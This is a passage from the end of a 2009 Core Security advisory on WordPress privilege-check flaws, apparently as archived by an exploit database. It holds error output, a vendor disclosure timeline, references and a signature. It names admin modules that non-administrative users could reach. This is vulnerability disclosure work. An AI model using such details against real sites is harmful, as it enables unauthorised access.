undefined constant ABSPATH - assumed 'ABSPATH' in\r\n[WP_LEAKED_PATH]\\wp-settings.php on line 112\r\nWarning: require(ABSPATHwp-includes/compat.php) [function.require]:\r\nfailed to open stream:\r\nNo such file or directory in [WP_LEAKED_PATH]\\wp-settings.php on line 246\r\nFatal error: require() [function.require]: Failed opening required\r\n'ABSPATHwp-includes/compat.php'\r\n(include_path='.;[PHP_LEAKED_PATH]\\php5\\pear') in\r\n[WP_LEAKED_PATH]\\wp-settings.php on line 246\r\n\r\n- -----------/\r\n\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-06-04:\r\nCore Security Technologies notifies the WordPress team of the\r\nvulnerabilities (security@wordpress.org) and offers a technical\r\ndescription encrypted or in plain-text. Advisory is planned for\r\npublication on June 22th.\r\n\r\n. 2009-06-08:\r\nCore notifies again the WordPress team of the vulnerability.\r\n\r\n. 2009-06-10:\r\nThe WordPress team asks Core for a technical description of the\r\nvulnerability in plain-text.\r\n\r\n. 2009-06-11:\r\nTechnical details sent to WordPress team by Core.\r\n\r\n. 2009-06-11:\r\nWordPress team notifies Core that a fix was produced and is available to\r\nCore for testing. WordPress team asserts that password and username\r\ndiscrimination as well as username leakage are known and will not be\r\nfixed because they are convenient for the users.\r\n\r\n. 2009-06-12:\r\nCore tells the WordPress team that the patch will be tested by Core as a\r\ncourtesy as soon as possible. It also requests confirmation that\r\nWordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to\r\nthe flaws included in the advisory draft CORE-2009-0515.\r\n\r\n. 2009-06-12:\r\nWordPress team confirms that WordPress 2.8 and earlier plus\r\nWordPress.com are vulnerable to the flaws included in the advisory draft.\r\n\r\n. 2009-06-17:\r\nCore informs the WordPress team that the patch is only fixing one of the\r\nfour proof of concept abuses included in the advisory draft. Core\r\nreminds the WordPress team that the advisory is scheduled to be\r\npublished on June 22th but a new schedule can be discussed.\r\n\r\n. 2009-06-19:\r\nCore asks for a new patched version of WordPress, if available, and\r\nnotifies the WordPress team that the publication of the advisory was\r\nre-scheduled to June 30th.\r\n\r\n. 2009-06-19:\r\nWordPress team confirms they have a new patch that has the potential to\r\nbreak a lot of plugins.\r\n\r\n. 2009-06-29:\r\nWordPress team asks for a delayance on advisory CORE-2009-0515\r\npublication until July 6th, when WordPress MU version will be patched.\r\n\r\n. 2009-06-29:\r\nCore agrees to delay publication of advisory CORE-2009-0515 until July 6th.\r\n\r\n. 2009-06-29:\r\nCore tells the WordPress team that other administrative PHP modules can\r\nalso be rendered by non-administrative users, such as module\r\n'admin-post.php' and 'link-parse-opml.php'.\r\n\r\n. 2009-07-02:\r\nWordPress team comments that 'admin.php' and 'admin-post.php' are\r\nintentionally open and plugins can choose to hook either privileged or\r\nunprivileged actions. They also comment that unprivileged access to\r\n'link-parse-opml.php' is benign but having this file open is bad form.\r\n\r\n. 2009-07-02:\r\nCore sends the WordPress team a new draft of the advisory and comments\r\nthat there is no capability specified in Worpress documentation for\r\nconfiguring plugins. Also control of actions registered by plugins is\r\nnot enforced. Core also notices that the privileges unchecked bug in\r\n'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development\r\nrelease.\r\n\r\n. 2009-07-06:\r\nCore requests WordPress confirmation of the release date of WordPress\r\n2.8.1 and WordPress MU 2.8.\r\n\r\n. 2009-07-07:\r\nWordPress team confirms that a release candidate of WordPress 2.8.1 is\r\nmade available to users and that the advisory may be published.\r\n\r\n. 2009-07-06:\r\nCore requests WordPress confirmation of the release date of WordPress MU\r\nand WordPress MU new version numbers.\r\n\r\n. 2009-07-07:\r\nWordPress team release WordPress 2.8.1 RC1 to its users.\r\n\r\n. 2009-07-08:\r\nWordPress team confirms that WordPress MU 2.8.1 will be made available\r\nas soon WordPress 2.8.1 is officially released. Probably July 8th or 9th.\r\n\r\n. 2009-07-08:\r\nThe advisory CORE-2009-0515 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] WordPress vulnerabilities in CVE database\r\nhttp://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress\r\n[2] SecuriTeam List of WordPress Vulnerabilities\r\nhttp://www.securiteam.com/products/W/Wordpress.html\r\n[3] WordPress Vulnerability - YBO Interactive Blog\r\nhttp://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/\r\n[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1\r\nhttp://wordpress.org/support/topic/280748\r\n[5] Security breach - xkcd blog\r\nhttp://blag.xkcd.com/2009/06/18/security-breach/\r\n[6] securityvulns.com WordPress vulnerabilities digest in English\r\nhttp://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded\r\n[7] CVE-2008-0196\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196\r\n[8] WordPress Roles and Capabilities\r\nhttp://codex.wordpress.org/Roles_and_Capabilities\r\n[9] WordPress Download Counter\r\nhttp://wordpress.org/download/counter/\r\n[10] WordPress Intrusion Detection System Plugin\r\nhttp://php-ids.org/2008/02/21/wpids-version-012-released/\r\n[11] Hardening WordPress with htaccess\r\nhttp://blogsecurity.net/wordpress/article-210607\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N\r\nTPRpR0Gn0WqmF8HOeDslbA8=\r\n=zEDK\r\n-----END PGP SIGNATURE-----\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/5473", "hash": "a98ab3ded3d3b6aa7b5545e30fb133b0cb2c98024c17271d24958ce340bcf83e"}]}}